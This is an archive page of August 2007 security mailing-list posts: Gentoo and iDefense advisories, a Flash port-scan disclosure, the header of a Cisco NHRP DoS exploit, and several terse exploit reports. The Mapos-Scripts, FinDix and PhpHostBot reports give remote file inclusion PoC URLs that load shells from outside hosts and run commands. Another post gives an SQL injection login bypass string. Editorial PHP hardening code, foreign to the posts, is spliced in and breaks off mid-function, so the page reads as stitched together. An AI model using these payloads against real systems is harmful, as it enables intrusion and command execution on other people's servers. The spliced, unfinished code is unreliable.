[ GLSA 200708-04 ] ClamAV: Denial of Service

2007-08-09 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200708-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ClamAV: Denial of Service
      Date: August 09, 2007
      Bugs: #185013
        ID: 200708-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in ClamAV, allowing for a Denial of
Service.

Background
==========

ClamAV is a GPL virus scanner.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav        < 0.91                        >= 0.91

Description
===========

Metaeye Security Group reported a NULL pointer dereference in ClamAV
when processing RAR archives.

Impact
======

A remote attacker could send a specially crafted RAR archive to the
clamd daemon, resulting in a crash and a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ClamAV users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.91"

References
==========

  [ 1 ] CVE-2007-3725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3725

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200708-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: TS-2007-002-0: BlueCat Networks Adonis root Privilege Access

2007-08-09 Thread security
BlueCat Networks acknowledges the existence of this issue and our testing 
confirms that this can allow a Proteus Administrator to write arbitrary data 
using TFTP to an Adonis system and potentially damage or compromise it.

This issue is the result of data validation errors in Proteus with respect to 
TFTP and can only be exploited by users with administrative privileges to the 
Proteus Admin Interface and sufficient access rights.  Without authenticated 
access to the Proteus Admin Interface, this vulnerability cannot be exploited, 
and we therefore consider it a minor security issue.  BlueCat Networks will be 
fixing this issue in an update to Proteus that will be made available shortly.

To prevent exploitation of this issue, BlueCat Networks recommends that 
customers restrict access to the TFTP services on Proteus through the Access 
Rights menu.  This can be done at two levels within the product:

1.  At a configuration level – by changing the access for TFTP Objects 
within the configuration (TFTP File, TFTP Folder and TFTP Group) to Hide or 
View privileges.
2.  At the TFTP Group level – by changing the access for TFTP Objects 
within the group (TFTP File and TFTP Folder) to Hide or View privileges.



Kindest regards,
BlueCat Networks Security


Re: [ELEYTT] 3SIERPIEN2007

2007-08-09 Thread xyborg
your mail looks like this...

http://seclists.org/fulldisclosure/2007/Jul/0288.html
http://seclists.org/fulldisclosure/2007/Jul/0290.html

you only put your eyes on the status bar, but the data URL scheme address bar
spoofing on Firefox isn't your discovery


Join us at OWASP Mumbai Meet : 6th September 2007

2007-08-09 Thread dharmeshmm
OWASP Mumbai joins in celebrating OWASP Live 0.

OWASP Live 0 is Day of Worldwide OWASP One Day Conferences.

Block your calendar on 6th September 2007 to join us on the event. 
Registrations for the event are FREE !!

Interested in Speaking / Sharing your thoughts??

The topic of the event will be on "Privacy in the 21st Century", so all talks 
should be related to it (we should be addressing the Web Application side of 
Privacy (for example what happens to Privacy with SQL Injection, XSS and issues 
like pdp's Snoop)

Send a mail to dharmeshmm at mastek dot com to confirm your presentation for 
the event.

Interested in Sponsoring??

Send a mail to dharmeshmm at mastek dot com or call at +91 98670 75327 to 
understand the sponsorship details.

Got MORE !! Ideas for the Event ??
Quickly write back to dharmeshmm at mastek dot com or call at +91 98670 75327 
to share and make this a successful meet !!

Details at: 
http://www.owasp.org/index.php/Mumbai#Theme_:_Privacy_in_21st_Century
Please feel free to share this information with your colleagues to share and gain
maximum information.


FinDix Remote File Inclusion Vulnerability

2007-08-09 Thread rizgar
FinDix Remote File Inclusion Vulnerability
---


Script  : FinDix

Site: http://ctw-design.com/styldiv/FindNix.zip

Founder : Rizgar

Contact : [EMAIL PROTECTED] 

Thanks  : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my 
heroes :]

---

Okay, now the bug found in the script:

Line : 34-35

/*
 * load page in content table
 */
if ($page == "")
   $page = "start.htm"; //* change to your start page content.


/*


PoC : 

http://www.site.com/findix/index.php?page=http://shell.txt?&cmd=id


iDefense Security Advisory 08.09.07: Hewlett-Packard OpenView Operations OVTrace Buffer Overflow Vulnerabilities

2007-08-09 Thread iDefense Labs
Hewlett-Packard OpenView Operations OVTrace Buffer Overflow Vulnerabilities

iDefense Security Advisory 08.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 09, 2007

I. BACKGROUND

OpenView Operations software is a suite of network management tools used
to monitor events on, and evaluate the performance of, hosts on the
network. The OVTrace component of this suite is used to log the actions
being taken by the other components of the suite in order to debug any
problems that may be occurring. More information can be found at the
following link.

http://h20229.www2.hp.com/products/ovowin/index.html

II. DESCRIPTION

Remote exploitation of multiple stack-based buffer overflow
vulnerabilities in Hewlett-Packard Development Co.'s OpenView
Operations for Windows OVTrace service may allow an attacker to execute
arbitrary code with SYSTEM privileges.

The vulnerabilities exist within functions responsible for handling
requests. These functions take a string from the request and copy it
into fixed-size stack buffers. Since the length has not been properly
validated, this results in an exploitable stack-based buffer overflow.

III. ANALYSIS

Exploitation of these vulnerabilities results in arbitrary code
execution with SYSTEM privileges.

The OVTrace service, while not crucial to normal operations, is started
by default. The OVTrace service is also present on systems that have
only the management console installed as well as systems that have a
full installation of the server and console installed.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in HP
OpenView version A.07.50 for Windows, with all patches applied as of
Jun 27, 2007. Previous versions may also be affected.

V. WORKAROUND

Employing firewalls to limit access to the affected service will
mitigate exposure to these vulnerabilities.

VI. VENDOR RESPONSE

Hewlett-Packard Co. has addressed these vulnerabilities by releasing
patches for all HP OpenView products that contain the Shared Trace
Service component. For more information consult the following HP
Support Documents; c01106515, c01109171, c01109584, c01109617,
c01110576, c01110627, c0851, c01112038, c01114023, c01114156,
c01115068 at the URLs shown below.

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01106515
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109171
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109584
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01109617
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110576
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01110627
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0851
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01112038
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114023
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01114156
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01115068

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-3872 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/12/2007  Initial vendor notification
07/13/2007  Initial vendor response
08/09/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of these vulnerabilities wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


VNSECON07 Materials released

2007-08-09 Thread Jerome Athias

Hi ladies and gentlemen,

I'm happy to announce the availability of my materials for my talk at 
VNSECON07 ( http://conf.vnsecurity.net/ ), Ho Chi Minh, Vietnam.

You can find the intro and slides + the full-text paper at:
https://www.securinfos.info/VNSECON2007

Covered topics:
* usage, enhancement and exploit modules development for the Metasploit 
Framework
* Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF 
eXploit Builder


The latest version of the presented tool "MSF eXploit Builder" should be 
released in a few days at:

https://www.securinfos.info/metasploit/MSF_XB.php

Best regards
Take care

/JA

-- The UNofficial French Metasploit's website: http://www.metasploit.fr




Design flaw in AS3 socket handling allows port probing

2007-08-09 Thread fukami

Design flaw in AS3 socket handling allows port probing

# Summary
Due to a design flaw in ActionScript 3 socket handling, compiled
Flash movies are able to scan for open TCP ports on any host
reachable from the host running the SWF, bypassing the Flash Player
Security Sandbox Model and without the need to rebind DNS.


# Technical background
In AS3 Adobe introduced a new socket-related event called
SecurityErrorEvent. This event is always thrown when a Flash Player
tries to connect to a socket that it is not allowed to connect to by
policy.


The problem with the SecurityErrorEvent is that it's thrown
immediately when a Flash Player tries to connect to a closed TCP
port. If a service is listening on that port the Flash Player writes
the string "" and waits for a response from the
service. Nearly no TCP service will respond to this request.


We can assume the following: when trying to connect to a socket that
the SWF is not allowed to connect to, and it doesn't get a SecurityErrorEvent
within 2 seconds, the port is most likely open.


A new Flash Player instance is used for every probed port because the
Flash Player sends only one policy-file request per player per host
per port.


# Tested platforms
Works on:
* Windows XP SP2: Internet Explorer 6 / Flash Player 9.0.47.0
* Windows XP SP2: Firefox 2.0.0.5 / Flash Player 9.0.47.0
* Windows XP SP2: IE 7.0.5730.11 Flash Player 9.0.47.0
* Ubuntu Edgy: Firefox 2.0.0.5 / Flash Player 9.0.47.0
* Mac OSX 10.4.10: Safari 2.0.4 / Flash Player 9.0.47.0
* Mac OSX 10.4.10: Safari 3.0.2 / Flash Player 9.0.47.0
* Mac OSX 10.4.10: Firefox 2.0.0.6 / Flash Player 9.0.47.0
* Solaris 10 i86: Firefox 2.0.0.3 / Flash Player 9.0.47.0
Doesn't work as expected on:
* Mac OSX 10.4.10: Opera 9.22 / Flash Player 9.0.47.0

# Known limitations
* The Scanner does not work on services that close the TCP
connection immediately after they receive bytes that they don't
"understand". The port is reported as closed because the
SecurityErrorEvent is thrown when the TCP connection is closed.
* The Scanner does not always work as expected when scanning
hosts located on the internet (e.g. google.com). This may happen
due to stateful inspection firewalls that close the connections or
long TCP response times.


# Disclosure Timeline
* 2007/07/23: Problem discovery
* 2007/07/24: PoC available
* 2007/07/25: Vendor notification
* 2007/08/09: Public demonstration at CCCamp

# Possible Fixes
Flash-Player Side (Adobe)
* TOTALLY REMOVE the SecurityErrorEvent (it's useless; it's just
harder to find errors with socket servers without the event)
* Remove the SecurityErrorEvent in the release players and keep
it in the debug players
* Make the SecurityErrorEvent behave EXACTLY the same for open
and closed ports

User Side
* Disable Flash
* Only allow Flash from trusted sites
* Downgrade Player to Version 8

# Links
* Flex 2 Socket: http://livedocs.adobe.com/flex/2/langref/flash/net/Socket.html
* Flex 2 SecurityErrorEvent: http://livedocs.adobe.com/flex/2/langref/flash/events/SecurityErrorEvent.html
* Flash Player 9 Security white paper: http://www.adobe.com/go/fp9_0_security
* Settings Manager: http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html


# Live PoC scanner
* http://scan.flashsec.org/

# Source Code
* http://scan.flashsec.org/classes/Main.as (compile using Adobe's
Flex 2 SDK)


# Credits
* David Neu [EMAIL PROTECTED] Problem-Discovery and PoC
* fukami, SektionEins, http://sektioneins.de/





Shoutbox 1.0 Remote Command Execution Vulnerability

2007-08-09 Thread rizgar
Shoutbox 1.0 Remote Command Execution Vulnerability 
---


Script  : Shoutbox 1.0

Version : 1.0

Site: http://www.mapos-scripts.de

Founder : Rizgar

Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , 
ColdHackers(nice boys)

d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", "Shoutbox 1.0"
---

include($root.'config.php');
include($root.'includes/dbconnect.php');
include($root.'includes/function.php');


POC

http://www.site.com/shoutbox.php?root=http://evil.txt?&cmd=id

eof.


File Uploader Version 1.1 Remote Command Execution Vulnerability

2007-08-09 Thread rizgar
File Uploader Version 1.1 Remote Command Execution Vulnerability 
---


Script  : File Uploader Version 

Version : 1.1

Site: http://www.mapos-scripts.de

Founder : Rizgar

Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , 
ColdHackers(nice boys)

d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", 
---



include($config["root_ordner"].'includes/function.php');


POC

http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id
http://www.site.com/path/datei.php?config[root_ordner]=http://shell.txt?&cmd=id

EOF


Web News 1.1 Remote Command Execution Vulnerability

2007-08-09 Thread rizgar
Web News 1.1 Remote Command Execution Vulnerability 
---


Script  : Web News 

Version : 1.1

Site: http://www.mapos-scripts.de

Founder : Rizgar

Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , 
ColdHackers(nice boys)

d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", "Web News 1.1 and 1.0"
---

";
exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');

$header = style('index_body','header');
echo $header;

?>

PoC 

http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id
http://www.site.com/path/news.php?config[root_ordner]=http://shell.txt?&cmd=id
http://www.site.com/path/feed.php?config[root_ordner]=http://shell.txt?&cmd=id

..

EOF


Bilder Uploader 1.3 Remote Command Execution Vulnerability

2007-08-09 Thread rizgar
Bilder Uploader 1.3 Remote Command Execution Vulnerability 
---


Script  : Bilder Uploader 

Version : 1.3

Site: http://www.mapos-scripts.de

Founder : Rizgar

Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , 
ColdHackers(nice boys)

d0rk: "Copyright (c) 2007 by Mapos-Scripts.de", 
---

Okay, look at the nice code :)



http://www.site.com/path/gruppen.php?config[root_ordner]=http://evil.txt?&cmd=id

And others...

bild.php
feed.php
mitglieder.php
online.php
profil.php

..
..
..

Eof.


Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability

2007-08-09 Thread rizgar
Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability 
---


Script  : Mapos Bilder Galerie 

Version : 1.0

Site: http://www.mapos-scripts.de

Founder : Rizgar

Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack 

Thanks  : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , 
ColdHackers(nice boys)

d0rk: "Copyright (c) 2007 by Mapos-Scripts.de Version 1.0 (Login)", "Mapos 
Bilder Galerie Version 1.0"
---

Okay, look at the nice code :)


";
exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');


?>

PoC:

http://www.site.com/path/index.php?config[root_ordner]=http://evil.txt?&cmd=id
http://www.site.com/path/galerie.php?config[root_ordner]=http://evil.txt?&cmd=id
http://www.site.com/path/anzagien.php?config[root_ordner]=http://evil.txt?&cmd=id

..
..
..

Eof..


Gästebuch Version 1.5 Remote Command Execution Vulnerability

2007-08-09 Thread rizgar
Gästebuch Version 1.5 Remote Command Execution Vulnerability 
---


Script  : Gästebuch Version 

Version : 1.5

Site: http://www.mapos-scripts.de/downloads.php?download=11

Founder : Rizgar

Contact : [EMAIL PROTECTED] and irc.gigachat.net #kurdhack 

Thanks  : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my 
heroes :]

---



";
exit;
}
include($config["root_ordner"].'includes/dbconnect.php');
include($config["root_ordner"].'includes/function.php');
include($config["root_ordner"].'includes/captcha.php');
$header = style('index_body','header');
echo $header;

...

?>

PoC : 

http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id


Summercon 2007 Atlanta August 24 - 26

2007-08-09 Thread rragan
Summercon 2007, August 24 through 26.
Wyndham Midtown Hotel
Atlanta, GA

http://www.summercon.org

Summercon is the oldest of the hacker cons. It has been hosted in such fine 
cities as St. Louis, Atlanta, Washington, D.C., and Amsterdam. The con audience 
is a wide mix of security professionals, military officials, socialists, 
hackers, parents, artists, etc... It is a social event with presentations to 
help get the conversations started. There is little attitude, lots to learn, 
and plenty of fun at Summercon; all in the name of hacking. 

Summercon is FREE this year! Please buy a t-shirt to support the organizers' 
efforts.

Scheduled Speakers:
If you would like to speak, send an email to speakers@ s u m m e r con.org with
information about what you would like to speak on. We are in the process of
compiling the speaker list, but we still need more speakers.

Hotel Information:
Wyndham Midtown Hotel
125 10th Street NE
Atlanta, GA 30309
+1 404-873-4800

See the website (summercon.org) for more information.


Cisco NHRP denial of service (cisco-sa-20070808-nhrp)

2007-08-09 Thread Martin Kluge
Hi,

this exploit/DoS addresses the recent NHRP bug in Cisco IOS (CSCin95836 /
cisco-sa-20070808-nhrp). The original advisory can be found here:

http://www.cisco.com/en/US/products/products_security_advisory09186a008089963b.shtml


Exploit/DoS:

/**/
/**/
/* nhrp-dos - Copyright by Martin Kluge, <[EMAIL PROTECTED]>
*/
/**/
/* Feel free to modify this code as you like, as long as you include the  */
/* above copyright statement. */
/**/
/* Please use this code only to check your OWN cisco routers. */
/**/
/* Cisco bug ID: CSCin95836   */
/**/
/* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used  */
/* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA)   */
/* subnetwork to determine the internetworking layer address and NBMA */
/* subnetwork addresses of the NBMA next hop towards the destination. */
/* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */
/* IPSEC. */
/**/
/* URLs:  */
/* - [RFC2332/NHRP]   http://rfc.net/rfc2332.html */
/* - [RFC1701/GRE]http://rfc.net/rfc1701.html */
/* - [DMVPNs with Cisco]  http://www.cisco.com/en/US/tech/tk583/tk372/techno  */
/*logies_white_paper09186a008018983e.shtml*/
/**/
/* This code was only tested on FreeBSD and Linux, no warranty is or will be  */
/* provided.  */
/**/
/* Vulnerable images (tested):*/
/**/
/*  - c7100-jk9o3s-mz.123-12e.bin */
/*  - c7200-jk8o3s-mz.122-40.bin  */
/*  - c3640-js-mz.122-15.T17.bin  */
/* (and many other IOS versions on different platforms)   */
/**/
/* Vulnerable configuration on cisco IOS: */
/**/
/* interface Tunnel0  */
/*  ip address 10.0.0.1 255.255.255.128   */
/*  no ip redirects   */
/*  no ip proxy-arp   */
/*  ip mtu 1464   */
/*  ip nhrp authentication mysecret   */
/*  ip nhrp network-id 1000   */
/*  ip nhrp map multicast dynamic */
/*  ip nhrp server-only   */
/*  ip nhrp holdtime 30   */
/*  tunnel source FastEthernet0/0 */
/*  tunnel mode gre multipoint*/
/*  tunnel key 123456789  */
/**/
/* This exploit works even if "ip nhrp authentication" is configured on the   */
/* cisco router. You can also specify a GRE key (use 0 to disable this*/
/* feature) if the GRE tunnel is protected. You don't need to know the*/
/* NHRP network id (or any other configuration details, except the GRE key if */
/* it is set on the target router).   */
/**/
/* NOTE: The exploit only seems to work, if a NHRP session between the target */
/*   router and at least one client is established.   */
/* 

[ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability

2007-08-09 Thread erdc
ECHO_ADV_83$2007

-
[ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion 
Vulnerability
-

Author : M.Hasran Addahroni
Date   : August 7th, 2007
Location   : Australia, Sydney
Web: http://advisories.echo.or.id/adv/adv83-K-159-2007.txt
Critical Lvl   : Dangerous
Impact : System access
Where  : From Remote
---

Affected software description:
~~~

Application   : PhpHostBot  
version   : <= 1.06
Vendor: http://www.idevspot.com/PhpHostBot.php
Description :

PhpHostBot is a webware PHP application which integrates with the popular 
Cpanel(WHM) web hosting control panel.
PhpHostBot supports Paypal subscriptions, free web hosting, Subdomain and 
Reseller account setup 
and supports both dedicated server and Reseller web hosting companies

---

Vulnerability:
~

Input passed to the "svr_rootscript" parameter in order/login.php is not 
properly verified before being used to include files. 
This can be exploited to include arbitrary files from local or external 
resources.
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~

http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?

Google Dork:
~~
 "order?page=plan_show"

Solution:
~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals
- use the latest version 

Timeline:


- 27-07-2007 bug found
- 04-08-2007 vendor contacted
- 07-08-2007 advisory released
---

Shoutz:

~ ping - my dearest wife, zautha my little son, for all the luv the tears n the 
breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for 
the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, 
stev_manado, nofry, x16
~ [EMAIL PROTECTED]
~ #aikmel #e-c-h-o @irc.dal.net

---
Contact:
~

 K-159 || echo|staff || eufrato[at]gmail[dot]com
 Homepage: http://k-159.echo.or.id/

 [ EOF ] --
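Every Remote File Inclusion report on this page shares one root cause: the Mapos-Scripts advisories above (include($config["root_ordner"] ...), include($root ...), and $page in FinDix) and this PhpHostBot svr_rootscript advisory all build an include path from a variable that register_globals lets the request populate, after which allow_url_fopen (or, from PHP 5.2 on, allow_url_include) lets PHP fetch and execute the remote file. The PHP below is an added example rather than code from any of those projects. It shows the vulnerable shape next to a hardened replacement that pins the base directory in a constant defined by the script itself and uses the request value only as an allowlist key. APP_ROOT, ALLOWED_PAGES and the page names are assumptions made for the example.

```php
<?php
declare(strict_types=1);

// Added example, not code from PhpHostBot or Mapos-Scripts. The first function
// reproduces the vulnerable shape from the advisories; the rest is a hardened
// replacement. Run from the CLI: php rfi_hardening.php

// ---- Vulnerable shape (kept only for comparison; do not deploy) --------------
// With register_globals=On, a request such as
//   ?config[root_ordner]=http://shell.txt?   or   ?svr_rootscript=http://attacker/evil?
// fills the variable before any include runs, and with allow_url_include on
// (allow_url_fopen alone on PHP < 5.2) PHP fetches and executes the remote file.
function vulnerableIncludePath(array $config): string
{
    return $config['root_ordner'] . 'includes/function.php';   // no validation at all
}

// ---- Hardened shape -----------------------------------------------------------
// The base directory is a constant defined here, so no request variable can
// precede or override it, whatever register_globals says.
const APP_ROOT = __DIR__ . '/';
// Assumed allowlist of pages this application may load into its content table.
const ALLOWED_PAGES = ['start.htm', 'news.htm', 'contact.htm'];

/** Library includes take no input at all: the path is built from the constant only. */
function libraryIncludePath(string $file): string
{
    return APP_ROOT . 'includes/' . $file;
}

/**
 * Resolve a user-selected page to a file under APP_ROOT/pages, or null when the
 * request is not one of the known pages. The request value is used only as an
 * allowlist key and never spliced into a path, so "http://", "../" and NUL
 * bytes never reach include().
 */
function resolvePage(array $request): ?string
{
    $page = $request['page'] ?? 'start.htm';
    if (!is_string($page) || !in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    return APP_ROOT . 'pages/' . $page;
}

/**
 * Report the php.ini switches that turn this bug class into remote code
 * execution. register_globals no longer exists in PHP >= 5.4, so ini_get()
 * returns false there and the setting is reported as safe.
 */
function riskyIniSettings(): array
{
    $risky = [];
    foreach (['register_globals', 'allow_url_include'] as $key) {
        if (filter_var((string) ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $key;
        }
    }
    return $risky;
}

// Constructed requests: a legitimate page and the two shapes seen in the advisories.
$samples = [
    ['page' => 'news.htm'],
    ['page' => 'http://shell.txt?'],
    ['page' => '../../etc/passwd'],
];
foreach ($samples as $request) {
    printf("%-22s -> %s\n", $request['page'], resolvePage($request) ?? 'REJECTED');
}
printf("vulnerable path from a poisoned \$config: %s\n",
    vulnerableIncludePath(['root_ordner' => 'http://shell.txt?']));
printf("hardened library path: %s\n", libraryIncludePath('function.php'));
printf("risky ini settings: %s\n", implode(', ', riskyIniSettings()) ?: 'none');
```

The allowlist is the part that matters: filtering "http://" out of the value still leaves directory traversal and wrapper schemes, whereas a dictionary lookup accepts nothing that was not written into the script. The ini check is a deployment self-test for the two settings the PhpHostBot advisory's solution section names.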


[ GLSA 200708-03 ] libarchive (formerly named as bsdtar): Multiple pax Extension Header Vulnerabilities

2007-08-09 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200708-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libarchive (formerly named as bsdtar): Multiple pax
            Extension Header Vulnerabilities
      Date: August 08, 2007
      Bugs: #184984
        ID: 200708-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were found in libarchive (formerly named as
app-archive/bsdtar), possibly allowing for the execution of arbitrary
code or a Denial of Service.

Background
==========

libarchive is a library for manipulating different streaming archive
formats, including certain tar variants, several cpio formats, and both
BSD and GNU ar variants.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  app-arch/libarchive         < 2.2.4                       >= 2.2.4

Description
===========

CPNI, CERT-FI, Tim Kientzle, and Colin Percival reported a buffer
overflow (CVE-2007-3641), an infinite loop (CVE-2007-3644), and a NULL
pointer dereference (CVE-2007-3645) within the processing of archives
having corrupted PaX extension headers.

Impact
======

An attacker can trick a user or an automated system into processing an
archive with malformed PaX extension headers, resulting in the execution
of arbitrary code, a crash of the application using the library, or a
high CPU load.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libarchive or bsdtar users should upgrade to the latest libarchive
version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-arch/libarchive-2.2.4"

References
==========

  [ 1 ] CVE-2007-3641
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3641
  [ 2 ] CVE-2007-3644
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3644
  [ 3 ] CVE-2007-3645
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3645

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200708-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [ELEYTT] 4SIERPIEN2007

2007-08-09 Thread support1
The isChecked vulnerability with the Advanced Searchbar has been 
patched/repaired in the newest version 3.33 
http://www.advancedsearchbar.com/asbsetup.exe

Gerald O'Dea
Advanced Search Technologies, Inc.

 


[Aria-Security.net] SAS Hotel Management System SQL Injection

2007-08-09 Thread Advisory
__

A R I A - S E CU R I T Y  
___

SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp


Explanation:

http://path/admin/admin.asp

Username: anything' OR 'x'='x
password: anything' OR 'x'='x



Credits: Aria-Security Team
http://aria-security.net
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]
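The bypass above works because the login page splices the submitted username and password into the SQL text, so the quote in anything' OR 'x'='x closes the string literal and the OR adds a tautology that matches every row. SAS Hotel Management System is classic ASP; the PHP below is an added example of the same pattern (not SAS Hotel's code) that uses an in-memory SQLite database through PDO (the pdo_sqlite extension is assumed) so the concatenated query and its parameterized replacement can be run side by side on the advisory's own input. The table, the sample account and its password are constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example, not SAS Hotel's code. Requires the pdo_sqlite extension.
function setupDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE admins (username TEXT, password TEXT)');
    // Constructed sample record; a real system stores a password hash, not the password.
    $db->exec("INSERT INTO admins VALUES ('admin', 'correct horse battery staple')");
    return $db;
}

// Vulnerable: values are spliced into the SQL text. With the advisory's input
//   anything' OR 'x'='x
// the WHERE clause becomes
//   username = 'anything' OR 'x'='x' AND password = 'anything' OR 'x'='x'
// and, because AND binds tighter than OR, the trailing OR 'x'='x' is true for every row.
function vulnerableLogin(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT COUNT(*) FROM admins WHERE username = '$user' AND password = '$pass'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened: the SQL text is fixed and the values travel as bound parameters,
// so the quote in the input is just data and only a real credential pair matches.
function safeLogin(PDO $db, string $user, string $pass): bool
{
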